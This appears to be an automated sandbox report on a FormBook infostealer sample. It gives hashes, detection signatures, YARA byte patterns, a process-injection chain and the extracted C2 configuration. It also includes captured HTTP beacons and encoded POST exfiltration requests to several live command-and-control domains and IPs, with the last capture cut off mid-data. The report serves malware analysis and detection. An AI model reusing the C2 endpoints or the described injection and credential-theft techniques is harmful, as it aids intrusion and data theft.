
Windows Analysis Report
NHYGUnNN.exe

Overview

General Information

Sample Name: NHYGUnNN.exe
Analysis ID: 756156
MD5: 4f9c8432b57fa1aa875071de547ba947
SHA1: e1cc52fd851621743ba562a65161bfafed8e6b2b
SHA256: 9f0d17930a9312b8d8dfb23119b57fed676a1bb15fc1582754ab94201651b221
Tags: exe, formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • NHYGUnNN.exe (PID: 5380 cmdline: C:\Users\user\Desktop\NHYGUnNN.exe MD5: 4F9C8432B57FA1AA875071DE547BA947)
    • RegSvcs.exe (PID: 5148 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 4844 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
  • cleanup
{"C2 list": ["www.needook.com/4u5a/"]}
Source / Rule / Description / Author / Strings

Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x6631:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1f070:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa8cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x17e07:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x17c05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x176b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17d07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x17e7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa49a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x168fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edda:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x1a0e9:$sqlite3step: 68 34 1C 7B E1
    • 0x1ac61:$sqlite3step: 68 34 1C 7B E1
    • 0x1a12b:$sqlite3text: 68 38 2A 90 C5
    • 0x1aca6:$sqlite3text: 68 38 2A 90 C5
    • 0x1a142:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1acbc:$sqlite3blob: 68 53 D8 7F 8C

Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
      No Sigma rule has matched
      Timestamp: 11/29/22-18:25:42.914102
      Source IP: 192.168.2.6
      Destination IP: 154.209.6.241
      SID: 2829004
      Source Port: 49722
      Destination Port: 80
      Protocol: TCP
      Classtype: A Network Trojan was detected


      AV Detection

      Source: NHYGUnNN.exe | ReversingLabs: Detection: 27%
      Source: Yara match | File source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: NHYGUnNN.exe | Joe Sandbox ML: detected
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.needook.com/4u5a/"]}
      Source: NHYGUnNN.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdb source: NHYGUnNN.exe
      Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdb source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdbBSJB source: NHYGUnNN.exe
      Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdbBSJB source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
      Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00BD2CA0 FindFirstFileW,FindNextFileW,FindClose,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop edi
      Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop edi
      Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop edi

      Networking

      Source: C:\Windows\explorer.exe | Network Connect: 38.55.236.89 80
      Source: C:\Windows\explorer.exe | Domain query: www.darkchocolatebliss.com
      Source: C:\Windows\explorer.exe | Domain query: www.marketmall.digital
      Source: C:\Windows\explorer.exe | Network Connect: 172.67.148.132 80
      Source: C:\Windows\explorer.exe | Network Connect: 54.38.220.85 80
      Source: C:\Windows\explorer.exe | Network Connect: 154.209.6.241 80
      Source: C:\Windows\explorer.exe | Network Connect: 89.31.143.1 80
      Source: C:\Windows\explorer.exe | Domain query: www.canadianlocalbusiness.com
      Source: C:\Windows\explorer.exe | Domain query: www.y31jaihdb6zm87.buzz
      Source: C:\Windows\explorer.exe | Network Connect: 162.213.255.142 80
      Source: C:\Windows\explorer.exe | Domain query: www.ope-cctv.com
      Source: C:\Windows\explorer.exe | Domain query: www.dersameh.com
      Source: Traffic | Snort IDS: 2829004 ETPRO TROJAN FormBook CnC Checkin (POST) 192.168.2.6:49722 -> 154.209.6.241:80
      Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
      Source: Malware configuration extractor | URLs: www.needook.com/4u5a/
      Source: Joe Sandbox View | ASN Name: COGENT-174US COGENT-174US
      Source: Joe Sandbox View | ASN Name: QSC-AG-IPXDE QSC-AG-IPXDE
      Source: global traffic | HTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed HTTP/1.1 | Host: www.ope-cctv.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s HTTP/1.1 | Host: www.dersameh.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 HTTP/1.1 | Host: www.darkchocolatebliss.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s HTTP/1.1 | Host: www.y31jaihdb6zm87.buzz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m HTTP/1.1 | Host: www.marketmall.digital | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /4u5a/?l0GX=oAzQ4htCGi4nqSyuBtGVfUCtoVNBPGpnnjqt2pSGyg/seKLGD+qTa4VfLqEZsFdX3QB0KgbSd28tsjFwPlPYkk5JGWRtP+2k/VY6r0frt1hO&GFQD=d2J0s HTTP/1.1 | Host: www.canadianlocalbusiness.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: Joe Sandbox View | IP Address: 89.31.143.1 89.31.143.1
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.dersameh.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.dersameh.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dersameh.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 4f 4d 55 79 49 34 48 4b 35 31 32 2d 67 55 49 7a 31 2d 55 52 64 63 28 79 52 35 48 51 7e 59 4c 4c 35 72 75 31 30 79 78 5a 6b 52 36 5f 76 35 64 77 58 51 59 4e 35 56 4c 5a 6b 66 43 4b 44 4c 75 4c 28 46 76 59 79 38 4b 33 78 72 33 55 32 38 37 33 28 36 58 61 54 56 44 39 4a 69 53 7a 62 51 55 45 64 6d 57 53 53 45 59 6a 4b 4c 68 4a 28 6e 61 47 54 67 61 49 66 65 35 64 4a 72 4b 55 73 41 68 57 56 47 76 44 4b 61 43 54 77 78 78 39 38 34 77 68 4c 53 30 69 51 37 67 37 48 31 63 69 4e 79 45 48 30 58 30 39 51 39 61 64 39 36 4e 69 68 59 77 5f 6b 74 7a 49 28 57 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=OMUyI4HK512-gUIz1-URdc(yR5HQ~YLL5ru10yxZkR6_v5dwXQYN5VLZkfCKDLuL(FvYy8K3xr3U2873(6XaTVD9JiSzbQUEdmWSSEYjKLhJ(naGTgaIfe5dJrKUsAhWVGvDKaCTwxx984whLS0iQ7g7H1ciNyEH0X09Q9ad96NihYw_ktzI(Wo.
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.dersameh.comConnection: closeContent-Length: 1454Cache-Control: no-cacheOrigin: http://www.dersameh.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dersameh.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 4f 4d 55 79 49 34 48 4b 35 31 32 2d 68 33 51 7a 33 64 38 52 56 63 28 78 65 5a 48 51 72 49 4b 6a 35 72 69 31 30 7a 6b 55 6a 6e 4b 5f 76 50 42 77 58 79 41 4e 31 31 4c 5a 69 66 43 4f 65 62 76 51 28 46 72 2d 79 39 61 42 78 70 37 55 33 62 66 33 75 73 6a 64 59 46 44 46 4c 53 54 6c 62 51 56 4f 64 6d 47 65 53 45 55 61 4b 4c 70 4a 28 52 4f 47 57 51 61 4c 61 65 35 64 4a 72 4b 59 73 41 67 48 56 43 37 62 4b 61 71 44 33 43 35 39 28 5a 51 68 4a 7a 30 6c 42 72 68 38 62 6c 64 50 42 43 46 37 79 47 42 46 59 65 4b 2d 69 72 38 4b 6c 5a 4e 72 7e 63 62 44 68 78 61 54 7a 5f 4f 49 4e 79 6e 37 54 6f 57 4d 7e 73 51 33 6f 50 6f 4c 61 70 4f 41 33 41 36 30 6e 4f 67 6a 46 4d 57 69 72 52 4c 68 35 30 69 78 72 4b 6a 41 64 51 72 76 36 51 53 37 6a 33 51 72 53 5f 7e 5a 73 30 38 36 72 45 34 52 74 77 56 4c 7a 48 6d 4d 54 4b 7e 44 62 58 62 5f 4e 51 47 6d 69 62 37 4a 46 4e 49 55 53 47 36 39 74 48 4a 75 4d 64 63 5f 63 2d 30 61 55 6e 6b 4c 58 46 54 48 31 5a 48 61 49 6e 42 50 63 37 65 6f 55 4e 79 2d 6f 4f 34 61 6a 38 53 65 47 5f 66 6a 65 70 7a 71 69 72 65 46 6f 44 53 51 5a 31 74 76 65 43 57 71 57 6d 32 4f 69 5a 51 4b 78 5f 38 31 67 48 51 72 53 7a 43 5f 63 6a 63 4c 64 6a 46 69 62 35 41 74 55 49 7e 67 34 53 52 48 51 5a 7a 51 75 52 59 41 62 39 50 35 79 66 54 4d 61 4b 38 61 4b 73 72 69 64 78 4d 68 30 77 48 61 76 69 5a 45 5a 68 42 30 78 35 41 32 4f 70 46 66 33 6c 55 54 70 61 71 31 56 4e 36 42 38 52 34 6f 63 44 58 31 7e 74 6f 68 7a 68 4e 56 46 63 61 69 34 6e 47 78 79 32 45 62 6a 65 38 49 7e 37 48 62 31 7a 65 79 61 6f 4d 6b 43 77 5a 42 69 65 30 4c 41 69 56 63 30 74 46 76 42 53 31 
47 79 67 55 2d 46 42 64 46 33 65 4c 4f 4d 2d 28 44 34 78 4f 71 70 4b 5a 5f 39 2d 42 67 73 47 79 77 64 33 57 70 7e 53 52 35 36 6b 7a 6e 56 52 4e 77 6f 44 6d 55 72 6e 50 43 48 42 31 42 7e 65 6e 4b 32 55 44 44 6c 71 32 71 62 32 42 6d 4a 51 7a 58 67 6e 35 2d 52 2d 48 55 56 50 57 6b 62 44 5a 71 49 61 6e 33 68 53 57 55 4e 62 50 55 52 39 6d 47 57 41 62 6b 37 48 55 58 4b 46 7e 36 4b 41 34 5f 41 34 5a 70 56 42 49 47 39 54 66 30 75 31 5a 4b 34 69 49 36 4f 44 49 59 39 73 48 7a 71 6a 7e 78 6a 52 36 44 4d 79 50 69 54 5a 4d 39 39 5f 63 6f 63 63 65 46 74 6e 54 58 32 31 47 35 75 5f 7e 33 6f 30 71 72 6a 57 7a 79 4b 49 52 5f 4b 54 6d 62 28 5f 66 41 79 37 32 45 7a 51 4a 43 75 44 7e 32 28 53 49 75 65 47 30 52 43 55 4c 56 41 33 65 59 7e 46 4d 6d 77 51 59 71 72 56 45 61 44 52 71 61 53 6a 77 57 44 57 28 72 76 69 67 31 4e 77 73 77 7a 65 34 34 73 50 7e 46 4e 34 4e 50 48 46 66 55 30 55 33 54 62 2d 4c 42 6a 37 78 4d 34 76 34 66 75 2d 62 36 50 63 41 7a 6b 59 34 64 50 67 48 56 52 30 72 39 68 75 71 6d 33 55 4e 66 30 69 78 4d 41 58 4a 75 7a 6
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.darkchocolatebliss.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.darkchocolatebliss.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6b 78 6b 2d 48 45 6d 75 43 65 6c 57 71 4e 67 47 36 79 57 44 69 72 48 68 79 33 54 50 70 4d 63 69 4e 37 30 42 7e 43 65 42 52 4b 77 31 74 30 41 47 57 35 77 36 33 42 7a 51 7e 68 75 4b 4d 2d 36 30 32 65 70 42 77 49 69 43 6b 59 30 75 6a 58 61 44 67 55 67 47 47 78 4a 44 4b 75 35 38 78 4d 37 7a 54 34 4b 56 77 5f 4a 54 7e 65 61 5f 6c 47 67 50 36 69 62 4b 6f 64 64 31 76 4e 33 69 49 64 5a 35 69 52 4e 56 6a 6c 44 76 44 59 50 6c 54 6e 72 6b 4a 64 6e 5a 38 46 6a 78 68 7a 74 6e 71 5a 47 44 30 4e 61 36 58 50 6b 69 36 31 46 53 36 30 77 69 56 41 28 74 69 70 30 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=kxk-HEmuCelWqNgG6yWDirHhy3TPpMciN70B~CeBRKw1t0AGW5w63BzQ~huKM-602epBwIiCkY0ujXaDgUgGGxJDKu58xM7zT4KVw_JT~ea_lGgP6ibKodd1vN3iIdZ5iRNVjlDvDYPlTnrkJdnZ8FjxhztnqZGD0Na6XPki61FS60wiVA(tip0.
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeContent-Length: 1454Cache-Control: no-cacheOrigin: http://www.darkchocolatebliss.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.darkchocolatebliss.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6b 78 6b 2d 48 45 6d 75 43 65 6c 57 6f 75 6f 47 34 54 57 44 7a 62 48 2d 73 48 54 50 77 63 63 6d 4e 37 34 42 7e 47 47 52 52 38 51 31 73 6d 34 47 58 61 49 36 36 68 7a 51 70 78 75 4f 50 4f 37 32 32 65 39 4e 77 4a 54 67 6b 61 59 75 69 30 69 44 6d 57 49 48 66 52 4a 64 64 4f 35 7a 78 4d 37 63 54 34 61 52 77 5f 4d 49 7e 61 32 5f 6c 56 59 50 72 79 62 4c 6e 39 64 31 76 4e 33 75 49 64 59 6f 69 58 6c 33 6a 6b 4c 46 43 71 48 6c 54 43 6e 6b 61 71 62 59 30 6c 69 34 28 44 73 72 73 4c 66 75 73 37 62 4f 66 2d 41 61 73 33 46 4f 36 57 46 52 51 79 37 47 33 4a 63 38 35 6a 52 69 32 67 73 52 4a 4e 6f 33 6e 61 41 5a 4f 74 6c 2d 54 42 74 44 7a 4a 66 65 42 31 34 61 44 4d 6b 37 74 79 6a 56 62 49 36 77 57 59 39 30 73 36 28 30 44 57 50 35 4a 61 6f 79 78 72 4a 76 64 65 49 30 28 4f 54 4c 46 48 34 70 44 7a 6e 34 28 32 6f 78 7a 4f 62 71 73 6b 33 49 59 36 63 45 30 76 47 78 71 39 35 33 65 4b 6f 43 41 33 4d 41 6e 75 44 36 4a 49 4a 67 6a 66 65 5f 42 4d 47 77 4b 54 72 4a 6e 38 6c 5f 36 63 49 41 6b 50 4d 70 77 43 6d 32 6e 53 75 57 7a 7a 50 30 73 47 61 77 54 4f 52 63 31 53 38 69 76 33 75 30 51 70 62 37 34 6b 6b 6a 32 67 38 39 72 58 68 32 55 75 39 48 51 49 58 6b 43 35 75 44 73 6f 7e 78 6d 59 51 54 46 4e 70 55 41 35 68 54 59 5a 63 57 79 58 41 70 4e 6e 72 5f 72 6b 38 58 63 50 66 51 70 34 34 37 6b 6e 28 71 50 32 6b 57 52 36 37 69 53 6f 76 67 77 44 6f 53 4f 35 54 34 56 54 73 4e 68 76 46 4b 6a 38 4e 34 63 71 4e 53 59 33 33 57 4a 32 4a 73 64 67 70 47 41 78 39 6a 34 38 77 37 67 51 7a 32 46 49 44 72 34 71 63 59 44 45 72 71 75 31 38 30 39 33 57 36 5a 
72 6f 47 76 50 79 69 70 6b 45 42 57 68 35 32 51 78 4c 31 37 5a 64 65 4c 46 73 76 52 69 61 42 62 75 59 4a 55 5a 6e 52 56 4b 4e 5a 34 42 7e 35 51 67 58 79 57 6e 4c 79 62 2d 72 31 77 74 47 36 5a 74 70 53 4e 78 59 49 65 6d 41 42 56 7a 75 2d 66 65 4c 41 77 43 71 53 53 4b 71 52 49 37 46 67 7e 6c 50 53 59 55 4b 69 47 44 38 73 43 75 38 33 4b 30 4d 66 38 66 4f 37 38 6f 46 50 42 69 37 58 46 72 59 75 5a 4e 53 45 4b 38 7a 71 38 5f 56 50 79 78 34 47 67 67 75 52 54 43 61 77 33 4b 6f 5f 54 46 48 49 5a 59 58 58 5a 43 32 67 38 34 71 74 73 42 66 75 72 41 45 34 6e 43 38 75 48 71 62 42 36 34 78 42 38 45 30 38 77 46 6b 35 67 42 33 66 30 4a 58 71 54 38 49 71 75 51 41 78 6b 6a 6c 67 54 33 4d 6b 49 69 66 56 28 39 43 39 50 7a 44 35 32 30 7a 69 64 61 67 47 4c 4f 4d 43 61 68 56 68 64 54 47 5a 47 43 6b 35 55 76 65 76 28 57 30 76 65 59 5a 74 7e 37 74 37 61 53 57 68 30 65 51 6c 33 6e 7e 57 65 45 50 79 74 31 79 6b 32 69 74 74 5a 73 4c 61 61 77 62 4a 61 4e 30 43 4a 54 6c 46 78 44 73 53 47 50 78 6d 78 7a 47 62 6f 65 46 41 63 6b 64 6c 53 62 30 3
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.y31jaihdb6zm87.buzzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.y31jaihdb6zm87.buzz/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6c 66 6a 65 6d 53 6c 4c 42 38 6e 67 6c 33 72 48 49 65 79 58 61 59 34 6d 63 63 4e 51 65 44 58 74 30 4c 59 77 79 6f 55 64 32 5f 74 54 54 6d 57 31 44 76 53 65 74 37 57 6b 55 5f 70 6a 35 72 5a 37 6e 58 7a 41 57 39 57 70 73 78 66 51 6e 4d 76 79 4a 35 51 56 4c 68 67 57 55 6b 4a 6a 37 55 64 56 6a 5f 76 33 35 4a 44 64 42 63 69 75 53 44 32 44 70 6e 66 70 31 49 70 6d 62 75 74 64 56 48 75 77 6f 5f 43 79 54 6a 78 38 39 49 4a 79 6d 62 75 39 56 57 56 31 52 61 4e 34 64 62 59 70 33 58 39 77 61 38 4f 46 42 6d 53 30 50 63 65 57 61 43 7e 51 70 33 65 50 4a 30 73 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=lfjemSlLB8ngl3rHIeyXaY4mccNQeDXt0LYwyoUd2_tTTmW1DvSet7WkU_pj5rZ7nXzAW9WpsxfQnMvyJ5QVLhgWUkJj7UdVj_v35JDdBciuSD2Dpnfp1IpmbutdVHuwo_CyTjx89IJymbu9VWV1RaN4dbYp3X9wa8OFBmS0PceWaC~Qp3ePJ0s.
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.y31jaihdb6zm87.buzzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.y31jaihdb6zm87.buzz/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6c 66 6a 65 6d 53 6c 4c 42 38 6e 67 6c 33 72 48 49 65 79 58 61 59 34 6d 63 63 4e 51 65 44 58 74 30 4c 59 77 79 6f 55 64 32 5f 74 54 54 6d 57 31 44 76 53 65 74 37 57 6b 55 5f 70 6a 35 72 5a 37 6e 58 7a 41 57 39 57 70 73 78 66 51 6e 4d 76 79 4a 35 51 56 4c 68 67 57 55 6b 4a 6a 37 55 64 56 6a 5f 76 33 35 4a 44 64 42 63 69 75 53 44 32 44 70 6e 66 70 31 49 70 6d 62 75 74 64 56 48 75 77 6f 5f 43 79 54 6a 78 38 39 49 4a 79 6d 62 75 39 56 57 56 31 52 61 4e 34 64 62 59 70 33 58 39 77 61 38 4f 46 42 6d 53 30 50 63 65 57 61 43 7e 51 70 33 65 50 4a 30 73 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=lfjemSlLB8ngl3rHIeyXaY4mccNQeDXt0LYwyoUd2_tTTmW1DvSet7WkU_pj5rZ7nXzAW9WpsxfQnMvyJ5QVLhgWUkJj7UdVj_v35JDdBciuSD2Dpnfp1IpmbutdVHuwo_CyTjx89IJymbu9VWV1RaN4dbYp3X9wa8OFBmS0PceWaC~Qp3ePJ0s.
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeContent-Length: 1454Cache-Control: no-cacheOrigin: http://www.y31jaihdb6zm87.buzzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.y31jaihdb6zm87.buzz/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6c 66 6a 65 6d 53 6c 4c 42 38 6e 67 6b 58 62 48 4b 5f 79 58 4e 49 34 68 54 38 4e 51 46 7a 58 70 30 4c 55 77 79 70 51 4e 32 4a 4e 54 54 31 75 31 48 39 4b 65 72 37 57 6b 53 5f 6f 72 6b 37 5a 55 6e 58 33 69 57 39 47 35 73 7a 54 51 6d 76 6e 79 43 61 6f 55 44 78 67 55 51 6b 4a 67 37 55 64 41 6a 5f 28 6f 35 4a 48 37 42 63 71 75 53 78 65 44 76 58 66 6d 72 34 70 6d 62 75 74 76 56 48 76 54 6f 37 6e 68 54 6e 38 35 39 61 52 79 6f 66 79 39 51 78 68 79 5a 36 4e 38 55 37 59 34 7a 31 